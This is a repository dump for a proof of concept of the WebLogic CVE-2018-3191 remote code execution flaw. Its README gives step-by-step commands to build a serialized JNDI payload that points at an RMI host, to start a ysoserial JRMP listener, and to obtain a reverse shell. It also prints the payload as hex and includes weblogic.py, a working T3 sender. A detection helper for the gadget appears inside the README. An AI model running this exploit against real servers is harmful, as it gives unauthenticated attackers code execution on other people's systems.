├── README.md
├── generate-payload.jpg
├── get-tcp-shell.jpg
├── jas502n-poc.txt
├── jas502n.txt
├── listener-port-rmi.jpg
├── push.sh
├── send-payload.jpg
├── send.jpg
├── weblogic-web.jpg
├── weblogic.jpg
├── weblogic.py
└── ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

/README.md:
--------------------------------------------------------------------------------
# WebLogic CVE-2018-3191 remote code execution vulnerability

### WebLogic Docker environment

## 0x00 Overview

![](./weblogic.jpg)

On October 17 (Beijing time), Oracle's October Critical Patch Update (CPU) fixed a high-severity WebLogic remote code execution vulnerability, CVE-2018-3191.

The vulnerability allows an unauthenticated attacker with network access over the T3 protocol to compromise a vulnerable WebLogic Server; successful exploitation lets the attacker take over the WebLogic Server, resulting in remote code execution.

Oracle's official CPU advisory:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

Official fix:

Oracle has fixed this vulnerability in the October Critical Patch Update (CPU); affected users are strongly advised to upgrade as soon as possible.

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

## 0x01 Generate Payload

![](./weblogic-web.jpg)

### Usage:

```
java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://www.canyouseeme.cc:6668/Jas502n >jas502n.txt

https://github.com/voidfyoo/CVE-2018-3191/releases/download/10.3.6.0/weblogic-spring-jndi-10.3.6.0.jar

wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/12.2.1.3/weblogic-spring-jndi-12.2.1.3.jar

java -jar weblogic-spring-jndi.jar

Example:

java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp

weblogic-spring-jndi-12.2.1.3.jar for weblogic:

12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar for weblogic:

10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1
```

![](./generate-payload.jpg)

```
payload(hex):

aced00057372004d636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765724ef3ecfbb628982f0200085a001a616c6c6f77437573746f6d49736f6c6174696f6e4c6576656c735a001c6175746f6465746563745472616e73616374696f6e4d616e616765725a00196175746f646574656374557365725472616e73616374696f6e5a00146361636865557365725472616e73616374696f6e5a001f757365725472616e73616374696f6e4f627461696e656446726f6d4a6e64694c00167472616e73616374696f6e4d616e616765724e616d657400124c6a6176612f6c616e672f537472696e673b4c00267472616e73616374696f6e53796e6368726f6e697a6174696f6e52656769737472794e616d6571007e00014c0013757365725472616e73616374696f6e4e616d6571007e00017872005e636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e737570706f72742e4162737472616374506c6174666f726d5472616e73616374696f6e4d616e6167657235f8d3063abc94c402000749000e64656661756c7454696d656f75745a001d6661696c4561726c794f6e476c6f62616c526f6c6c6261636b4f6e6c795a0024676c6f62616c526f6c6c6261636b4f6e50617274696369706174696f6e4661696c7572655a00186e65737465645472616e73616374696f6e416c6c6f7765645a0017726f6c6c6261636b4f6e436f6d6d69744661696c75726549001a7472616e73616374696f6e53796e6368726f6e697a6174696f6e5a001b76616c69646174654578697374696e675472616e73616374696f6e7870ffffffff00010100000000000000010101007070740025726d693a2f2f7777772e63616e796f757365656d652e63633a363636382f4a61733530326e
```

## 0x02 Listen Java RMI

```
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command"

root@374bb3d9a2d8:/tools# ./rmi.sh
* Opening JRMP listener on 6668
```

![](./listener-port-rmi.jpg)

## 0x03 Send Payload to T3

```
python weblogic.py www.canyouseeme.cc 7001 jas502n.txt
```

![](./send-payload.jpg)

## 0x04 Get-Nc-Shell

![](./send.jpg)

![](./get-tcp-shell.jpg)
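The hex dump in 0x01 decodes to a serialized `com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager` carrying the `rmi://` name given to the generator, which is what weblogic.py wraps in T3 framing. The Python 3 helper below is an added defensive example, not part of this repository: it pulls class names and string constants out of a captured T3 body (or this README's `payload(hex)` text) and flags the gadget only when that class descriptor and a remote rmi/ldap/iiop URL occur together. The byte stream that `build_sample` produces is constructed for the demonstration, not a real WebLogic capture.

```python
"""Added defensive example (not part of this repository): inspect a captured T3
body, or this README's 'payload(hex)' dump, for the CVE-2018-3191 gadget."""
import re
import struct

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
GADGET_CLASS = "com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager"
REMOTE_JNDI = re.compile(r"^(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)
PRINTABLE = re.compile(rb"[\x20-\x7e]+")

def extract_strings(blob, min_len=4):
    """(kind, text) pairs for TC_CLASSDESC (0x72) and TC_STRING (0x74) records:
    tag, 2-byte big-endian length, modified-UTF-8 bytes. Byte-oriented, so it
    also copes with T3 framing around the object and with truncated captures."""
    found, i = [], 0
    while i + 3 <= len(blob):
        tag = blob[i]
        if tag in (0x72, 0x74):
            (length,) = struct.unpack(">H", blob[i + 1:i + 3])
            value = blob[i + 3:i + 3 + length]
            if length >= min_len and len(value) == length and PRINTABLE.fullmatch(value):
                found.append(("class" if tag == 0x72 else "string", value.decode("ascii")))
                i += 3 + length
                continue
        i += 1
    return found

def inspect_payload(blob):
    """The indicator fires only when the JtaTransactionManager class descriptor
    and a remote JNDI URL (rmi/ldap/iiop) both appear in the same stream."""
    strings = extract_strings(blob)
    classes = [v for k, v in strings if k == "class"]
    urls = [v for k, v in strings if k == "string" and REMOTE_JNDI.match(v)]
    return {"java_serialized": JAVA_SERIAL_MAGIC in blob, "classes": classes,
            "jndi_urls": urls,
            "cve_2018_3191_indicator": GADGET_CLASS in classes and bool(urls)}

def inspect_hex_dump(hex_text):
    """Accept the 'payload(hex):' form used in this README; whitespace is ignored."""
    return inspect_payload(bytes.fromhex("".join(hex_text.split())))

def build_sample(jndi_name):
    """Constructed minimal stream, not a real WebLogic capture: magic, TC_OBJECT,
    gadget class descriptor with one String field, then that field's value."""
    cls = GADGET_CLASS.encode()
    out = JAVA_SERIAL_MAGIC + b"sr" + struct.pack(">H", len(cls)) + cls
    out += b"\x00" * 8 + b"\x02\x00\x01"  # serialVersionUID, flags, field count
    out += b"L\x00\x13userTransactionName" + b"t\x00\x12Ljava/lang/String;" + b"xp"
    return out + b"t" + struct.pack(">H", len(jndi_name)) + jndi_name
```

Feeding the 0x01 hex text to `inspect_hex_dump` reports the class above together with the `rmi://www.canyouseeme.cc:6668/Jas502n` string, which is the pair a T3-facing IDS rule or a deserialization filter on the server should treat as hostile.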
## 0x05 References

https://github.com/voidfyoo/CVE-2018-3191

## YouTube demo video

[![CVE-2018-3191](https://i.ytimg.com/vi/KEgOrgcLu0s/hqdefault.jpg?sqp=-oaymwEZCNACELwBSFXyq4qpAwsIARUAAIhCGAFwAQ==&rs=AOn4CLCLGk3OZ83msmbe5IgfAq6EFN2Dhw)](https://youtu.be/6tC5aaUEVCw)

--------------------------------------------------------------------------------
/generate-payload.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/generate-payload.jpg
--------------------------------------------------------------------------------
/get-tcp-shell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/get-tcp-shell.jpg
--------------------------------------------------------------------------------
/jas502n-poc.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/jas502n-poc.txt
--------------------------------------------------------------------------------
/jas502n.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/jas502n.txt
--------------------------------------------------------------------------------
/listener-port-rmi.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/listener-port-rmi.jpg
--------------------------------------------------------------------------------
/push.sh:
--------------------------------------------------------------------------------
git add ./*
git commit -m "update"
git push -u origin
--------------------------------------------------------------------------------
/send-payload.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/send-payload.jpg
--------------------------------------------------------------------------------
/send.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/send.jpg
--------------------------------------------------------------------------------
/weblogic-web.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/weblogic-web.jpg
--------------------------------------------------------------------------------
/weblogic.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/weblogic.jpg
--------------------------------------------------------------------------------
/weblogic.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Python 2 script: opens a T3 connection, completes the handshake and sends the
# serialized object read from the file given as the third argument.
import socket
import os
import sys
import struct

# Three arguments are used below (host, port, payload file), so require all of them.
if len(sys.argv) < 4:
    print 'Usage: python %s <host> <port> <payload_file>' % os.path.basename(sys.argv[0])
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)

server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)

# Send headers: the T3 handshake (protocol version, abbreviation size, header
# length, max message size, peer URL); the server answers with HELO.
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)

data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data

payloadObj = open(sys.argv[3],'rb').read()

# T3 message header followed by a weblogic.rjvm.ClassTableEntry /
# weblogic.common.internal.PackageInfo chunk; the serialized object from the
# payload file is spliced in after it.
payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
# Trailing chunks: ClassTableEntry / PeerInfo / VersionInfo / PackageInfo
# descriptors and two weblogic.rjvm.JVMID objects.
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'

# adjust header for appropriate message length: the first 4 bytes of a T3
# message are its total length, big-endian
payload=struct.pack('>I',len(payload)) + payload[4:]

print '[+] Sending payload...'
sock.sendall(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
--------------------------------------------------------------------------------
/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
--------------------------------------------------------------------------------